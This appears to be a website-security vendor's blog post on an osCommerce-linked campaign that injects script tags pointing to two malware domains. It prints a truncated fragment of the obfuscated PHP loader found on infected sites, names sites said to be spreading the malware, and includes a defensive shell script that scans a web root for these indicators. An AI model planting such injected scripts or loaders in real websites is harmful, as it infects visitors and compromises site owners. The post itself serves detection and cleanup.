• DragosImport, Domboware Attacks

    In recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors to legitimate, benign sites that were compromised by malicious hackers. We discuss the details of these two distribution sites in this post.

    Is my site infected?
    First, to determine whether your site has been compromised by the infections described here, search your web hosting directory for the following two script references. They are shown with hxxp in place of http so that they are not live links; when searching, match on the domain and path rather than on the defanged prefix.

    script src=hxxp://dragosimport.com/js/
    script src=hxxp://domboware.hu/js/
    

    We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep on Windows) to search for the PHP code listed below; the leading @error_reporting(0); and the variable name $eva1fYlbakBcVSir are the stable parts to search for, since the rest of the loader is obfuscated.

    @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
    [snipped]
     $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
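
    The following POSIX shell scan is an added example and is not code from the original post or from StopTheHacker. It walks a web root and lists every file carrying one of the two injected script sources above or the obfuscated PHP loader, using grep -F so the dots in the domain names are literal. The indicator strings are taken from the snippets on this page; the sample web root, its file names and its paths are constructed here purely to demonstrate the scan, and the production path in the comments is an assumption.

```shell
#!/bin/sh
# Added example, not code from the original post: scan a web root for the
# indicators discussed above. The sample web root built below is constructed
# for illustration; real paths will differ.

# List every file under $1 that contains one of the indicators:
#   - the two injected script sources (matched by domain and path, so both
#     the live http:// form and a defanged hxxp:// copy are found)
#   - the first variable name and the @error_reporting(0); prefix of the
#     obfuscated PHP loader
# grep -F treats the patterns as fixed strings, so the dots are literal.
scan_webroot() {
    root="$1"
    grep -rlF \
        -e 'dragosimport.com/js/' \
        -e 'domboware.hu/js/' \
        -e 'eva1fYlbakBcVSir' \
        -e '@error_reporting(0);' \
        --include='*.php' --include='*.html' --include='*.htm' --include='*.js' \
        "$root" 2>/dev/null | sort
}

# Number of infected files; zero means the scan found nothing.
count_infected() {
    scan_webroot "$1" | wc -l | tr -d ' '
}

# Build a small constructed web root: one clean page, one page carrying the
# injected script tag, one include carrying the PHP loader, and a stylesheet
# that the scan deliberately ignores. Prints the directory path.
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/catalog" "$d/includes"
    printf '<html><body>Clean page</body></html>\n' > "$d/index.html"
    printf '<script src="hxxp://dragosimport.com/js/"></script>\n' > "$d/catalog/product.php"
    printf '<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { /* snipped */ } ?>\n' \
        > "$d/includes/header.php"
    printf 'body { color: black; }\n' > "$d/style.css"
    echo "$d"
}

# Run with "--demo" to see the scan against the constructed web root.
# In production call, for example: scan_webroot /var/www/html (assumed path).
if [ "${1:-}" = "--demo" ]; then
    demo=$(make_sample_webroot)
    echo "Infected files ($(count_infected "$demo")):"
    scan_webroot "$demo"
    rm -rf "$demo"
fi
```

    Because grep matches on the domain and path only, the scan also finds copies of the injection that a previous cleanup defanged but left in place, which is one way reinfected pages get overlooked.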
    

    One site found hosting this malware is nchr.org. Interestingly, many of the infected sites are running osCommerce. We will provide more detail on the vulnerability being exploited in an upcoming post.

    Which sites are aiding the attack?
    The list below includes the sites found participating in the distribution of the malware so far.

    www.cledwilliams.co.uk
    decohouz.com
    www.scanstore.nl
    www.blackmoresnight.com
    www.ldguideservice.com
    

    How do I protect my site?
    Webmasters and administrators should search their sites for every instance of the malware (malicious links, iframes, scripts and the injected PHP loader) and remove all occurrences. Removing the injected code alone is not enough if the entry point remains open: keep the web application patched (osCommerce in many of the cases seen here) and search again after cleanup to confirm the injection has not returned. Just as important is continuous monitoring of your website for compromise. You need to know promptly when your website has been compromised so that your visitors and your online reputation are not harmed.

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    Till next time…